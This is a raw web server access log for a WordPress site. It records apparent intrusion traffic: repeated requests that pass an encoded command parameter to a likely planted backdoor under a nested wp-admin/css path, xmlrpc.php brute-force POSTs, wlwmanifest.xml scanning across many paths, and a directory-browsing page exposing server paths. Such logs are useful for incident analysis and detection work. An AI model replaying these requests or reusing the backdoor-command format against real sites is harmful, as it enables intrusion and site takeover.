142.4.205.1 - - [16/Oct/2025:14:47:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343033312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303433312q3835326433633463303435333063336437616564373130663237363962613462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:47:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343035312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303435312q3535393065316130613162393761393932633463663837633066353964646333222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
61.219.140.50 - - [16/Oct/2025:14:48:39 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko"
142.4.205.1 - - [16/Oct/2025:14:47:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343037312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303437312q6132306362343966363832386431366464376435366438316331386631636536222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
61.219.140.50 - - [16/Oct/2025:14:49:08 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko"
142.4.205.1 - - [16/Oct/2025:14:48:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343039312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303439312q3262336434306436356139343962653334336538376233613262356561623637222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
69.197.179.242 - - [16/Oct/2025:14:47:59 -0400] "GET /wp-includes/wpdc3def/index.php?id=817974 HTTP/1.0" 200 4087 "https://academiedumarketing.com/wp-includes/wpdc3def/index.php?id=817974" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3"
142.4.205.1 - - [16/Oct/2025:14:48:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343131312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303531312q3665373633336266373136363235306434386531316461613235653835636464222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
61.219.140.50 - - [16/Oct/2025:14:49:36 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko"
142.4.205.1 - - [16/Oct/2025:14:48:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343133312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303533312q6566653462346261643161326434653062656631623534626438626435656364222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
114.119.145.188 - - [16/Oct/2025:14:49:56 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/www/brYIQEH HTTP/1.0" 200 7184 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/www" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
142.4.205.1 - - [16/Oct/2025:14:49:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343135312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303535312q3865666432333935643538663136336639326136393332333033633132663433222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:49:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343137312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303537312q6536383238366663346638393730363234333639346233316235306430396461222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
61.219.140.50 - - [16/Oct/2025:14:50:32 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko"
142.4.205.1 - - [16/Oct/2025:14:49:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343139312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303539312q6464633161633437643662333734656265386134393334393437343566623766222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:50:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343231312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303631312q3038373631633233373731323331316464326263636530386262396633366436222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.197 - - [16/Oct/2025:14:51:28 -0400] "GET /?_g=848213 HTTP/1.0" 200 26105 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.7339.207 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:14:50:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343233312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303633312q3064343138323738636539386139363633356664646235643562643830353962222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
61.219.140.50 - - [16/Oct/2025:14:51:48 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Windows NT 6.2; ARM; Trident/7.0; Touch; rv:11.0; WPDesktop; NOKIA; Lumia 1520) like Gecko"
142.4.205.1 - - [16/Oct/2025:14:50:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343235312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303635312q3963613538363137313333306165376232353132333332643161323335653365222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
162.240.238.76 - - [16/Oct/2025:14:51:57 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
162.240.238.76 - - [16/Oct/2025:14:51:58 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
162.240.238.76 - - [16/Oct/2025:14:51:59 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
162.240.238.76 - - [16/Oct/2025:14:52:00 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
162.240.238.76 - - [16/Oct/2025:14:52:01 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
162.240.238.76 - - [16/Oct/2025:14:52:02 -0400] "POST /xmlrpc.php HTTP/1.0" 200 9227 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.3.12 (KHTML, like Gecko) Version/10.0.2 Safari/602.3.12"
142.4.205.1 - - [16/Oct/2025:14:51:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343237312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303637312q3332393263313337366232616337346363643039313566363138653136386430222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:51:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343239312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303639312q3465343362366236303133376438343639366364623239396437643031376561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:51:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343331312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303731312q3138396537613938383061376239333233373365393532353962643961306334222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.195 - - [16/Oct/2025:14:52:50 -0400] "GET /?_g=1305277 HTTP/1.0" 200 25509 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:14:52:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343333312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303733312q3961653561623164383437663064613731636661363932373933346461376462222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
169.150.203.249 - - [16/Oct/2025:14:53:13 -0400] "GET //wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:14 -0400] "GET //xmlrpc.php?rsd HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
57.141.0.32 - - [16/Oct/2025:14:53:15 -0400] "GET /market/2274254392.htm HTTP/1.0" 200 102732 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
45.227.253.15 - - [16/Oct/2025:14:53:15 -0400] "GET /?of=1 HTTP/1.0" 200 13522 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3980 Safari/537.36 Edg/80.0.145.1"
169.150.203.249 - - [16/Oct/2025:14:53:15 -0400] "GET / HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:16 -0400] "GET //blog/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:16 -0400] "GET //web/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:17 -0400] "GET //wordpress/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:18 -0400] "GET //website/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:18 -0400] "GET //wp/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:19 -0400] "GET //news/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:20 -0400] "GET //2018/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:20 -0400] "GET //2019/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:21 -0400] "GET //shop/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:21 -0400] "GET //wp1/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:22 -0400] "GET //test/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
114.119.145.188 - - [16/Oct/2025:14:53:22 -0400] "GET /author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads/2024 HTTP/1.0" 200 7272 "https://academiedumarketing.com/author/auditwpmedia/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/uploads" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
169.150.203.249 - - [16/Oct/2025:14:53:22 -0400] "GET //media/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:23 -0400] "GET //wp2/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:24 -0400] "GET //site/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:24 -0400] "GET //cms/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
169.150.203.249 - - [16/Oct/2025:14:53:25 -0400] "GET //sito/wp-includes/wlwmanifest.xml HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:14:52:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343335312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303735312q3432643432653439323137393933313638346233366136646666326232643165222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:52:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343337312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303737312q3432333331663165633965323337663839336164316663666630353336666635222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:53:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343339312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303739312q3535366136396232383739316261626539623135346163383631353531656430222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
169.150.203.249 - - [16/Oct/2025:14:53:25 -0400] "" 400 0 "-" "-"
191.254.161.37 - - [16/Oct/2025:14:54:18 -0400] "POST /xmlrpc.php HTTP/1.0" 200 102732 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Safari/10.0.0.0 Safari/537.36"
142.4.205.1 - - [16/Oct/2025:14:53:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343431312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303831312q3763353232383065636366303136393538393064353237316534636132303461222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
66.249.65.196 - - [16/Oct/2025:14:54:42 -0400] "GET /?_g=646795 HTTP/1.0" 200 23870 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
142.4.205.1 - - [16/Oct/2025:14:53:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343433312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303833312q3132666466663238393036393564623436613066356538343764626662343033222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:54:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343435312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303835312q3934323231346461643965373739663031313036323466306564373337353962222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:54:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343437312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303837312q6632633830376435396234363261643965336230666234393130313639313765222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:54:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343439312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303839312q3930383630393133336536333363663636646538356137383735386431656163222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:55:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343531312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303931312q3262303639326133396135313465363362666563303263653130663566643038222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:55:31 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343533312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303933312q6639356337356636303737663063353662663437616230373263626436656164222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:55:51 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343535312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303935312q6465376639346630663535326438393837636238323466353764326134356231222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
142.4.205.1 - - [16/Oct/2025:14:56:11 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303634343537312p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303634303937312q6332323264383334643933383261393330353830646137633465626465353565222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
